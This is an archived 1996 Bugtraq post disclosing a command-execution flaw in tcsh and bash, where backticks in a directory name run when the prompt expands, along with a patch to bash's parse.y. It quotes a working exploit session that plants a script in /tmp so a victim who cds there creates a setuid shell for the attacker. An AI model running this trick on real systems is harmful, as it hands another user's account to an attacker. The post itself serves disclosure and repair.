Bugtraq mailing list archives
Vulnerability in expansion of PS1 in bash & tcsh
From: bethery () info enserb u-bordeaux fr (BETHERY Olivier)
Date: Thu, 19 Sep 1996 20:52:26 +0200
test (butafuco () MC NET) Fri, 13 Sep 1996 09:03:00 -0500 A vulnerability exists in tcsh (tcsh 6.05, or the one that's being handed out with BSDI anyway.) that allows the execution of arbitrary commands when changing into directories that are enclosed with back tic's. The problem might also prove to be quite bad to tcsh scripts that find themselves changing into directories on the fly. Here is probably one of the dumbest methods possible that could be used to exploit this weakness. ----------------------------Cut to Bad guy-------------------------------- jim% whoami Evol bad guy jim% mkdir /tmp/\`source\ .WaReZ\` jim% echo echo #\\\!/bin/sh \> .\$\$ > /tmp/*W*/.WaReZ jim% echo echo sh \> .\$\$ >> /tmp/*W*/.WaReZ jim% echo chmod 4755 .\$\$ >> /tmp/*W*/.WaReZ jim% chmod +x /tmp/*W*/.WaReZ ---------------------------Cut to unsuspecting foo------------------------ jim% whoami Unsuspecting foo jim% echo $SHELL /bin/tcsh jim% I just like to check that sometimes. jim% Hey, I'm bored maybe I'll check /tmp for some neato stuff jim% cd /tmp jim% ls `source .WaReZ` jim% OH BOY!!! the jack pot! jim% cd *WaReZ* jim% ls jim% oh, oh well maybe I'll check later... jim% cd $HOME ----------------------------Cut to More Bad guy-------------------------- jim% ls -a /tmp/*W*/ . .. .24753 jim% /tmp/*W*/.24753 $whoami unsuspecting foo $ hah. ---------------------------End Unix Parable-------------------------------
The antiquotes launch the expansion procedure so the expression between quote is evaluated. This expansion is running when PS1 variable need to be evaluate, with a cd command for example. So if the string between quotes is an command line, this line is executed with the UID of the user who is doing the cd command. A first fix for bash ( not tested with tcsh ): Do not use PS1 and do not include . in your path Second avaible fix for bash ( not tested with tcsh ): ( First Release, can be improve ) *** bash-1.14.7/parse.y Mon Aug 26 17:15:55 1996 --- bugfixed-bash/bash-1.14.7/parse.y Thu Sep 19 16:20:58 1996 *************** *** 2719,2727 **** #define EFFICIENT #ifdef EFFICIENT char *polite_directory_format (), t_string[MAXPATHLEN]; ! temp = get_string_value ("PWD"); ! if (!temp) getwd (t_string); else --- 2719,2733 ---- #define EFFICIENT #ifdef EFFICIENT char *polite_directory_format (), t_string[MAXPATHLEN]; ! char *mutmp; temp = get_string_value ("PWD"); ! /* BUGFIX -mu */ ! mutmp=temp; ! while (*mutmp != '\0') { ! if (*mutmp == '`') ! *mutmp='%'; ! mutmp++; ! } if (!temp) getwd (t_string); else _______________ BETHERY Olivier email: bethery () info enserb u-bordeaux fr
Current thread:
- Vulnerability in expansion of PS1 in bash & tcsh BETHERY Olivier (Sep 19)